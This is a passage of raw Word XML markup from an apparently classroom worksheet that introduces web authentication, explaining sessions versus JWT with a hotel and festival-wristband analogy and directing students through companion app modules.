              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="1A3A6E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="34"/>
                <w:szCs w:val="34"/>
              </w:rPr>
              <w:t xml:space="preserve">Introduction — The Big Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">How Does a Website Remember You After Login?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">You open Instagram. You type your password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">once</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. You browse for 45 minutes. Instagram shows your profile, your feed, your DMs — all personalised for you. But you never typed your password again. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">So how does it know it is still you?</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B75" w:sz="4"/>
              <w:left w:val="single" w:color="006B75" w:sz="24"/>
              <w:bottom w:val="single" w:color="006B75" w:sz="4"/>
              <w:right w:val="single" w:color="006B75" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E0F4F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="006B75"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✏️  THINK ABOUT IT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve">Before your teacher explains — what do you think is happening? How does the server know who you are on every page?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Write your initial guess below:</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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">My guess:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pP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6CC" w:sz="4"/>
              <w:left w:val="single" w:color="0066CC" w:sz="24"/>
              <w:bottom w:val="single" w:color="0066CC" w:sz="4"/>
              <w:right w:val="single" w:color="0066CC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EAF4FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A3A6E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">👉  DO THIS IN THE APP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Navigate to Module 01 in the app (top navigation bar).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Click the  ▶ Replay Animation  button.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Watch the animation: User → Login → Website → Remembered.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Notice the arrows showing information flowing back and forth.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">The Core Concept: Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> simply means: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0066CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"proving who you are to a computer system."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Every time you log in, the server needs to answer one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1B3E" w:sz="4"/>
              <w:left w:val="single" w:color="0D1B3E" w:sz="20"/>
              <w:bottom w:val="single" w:color="0D1B3E" w:sz="4"/>
              <w:right w:val="single" w:color="0D1B3E" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">"Is this person really who they claim to be — and have they proved it?"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">There are two main approaches the web has used to solve this problem:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0022"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sessions (the old way) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Server keeps a record of everyone logged in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00875A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT (the modern way) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">You carry a signed token that proves who you are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of it like this analogy: Imagine a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">hotel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where the receptionist remembers every guest (sessions) vs. a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">festival</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where you wear a wristband that proves you paid for entry (JWT). Both work — but they have very different tradeoffs.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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">In my own words, authentication means:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pP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Borders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="7B1010" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="34"/>
                <w:szCs w:val="34"/>
              </w:rPr>
              <w:t xml:space="preserve">Session-Based Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">What Is a Session?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Before JWT existed, every website used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. A session is like a server keeping a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"VIP guest list" in its memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. When you log in, the server adds your name to the list. Every time you make a request, it checks the list.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6CC" w:sz="4"/>
              <w:left w:val="single" w:color="0066CC" w:sz="24"/>
              <w:bottom w:val="single" w:color="0066CC" w:sz="4"/>
              <w:right w:val="single" w:color="0066CC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EAF4FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A3A6E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">👉  DO THIS IN THE APP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Go to Module 02 in the app.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Click  ▶ Animate Flow  — watch each of the 5 steps appear one by one.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Read each step carefully as it appears on screen.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">The Session Flow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0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
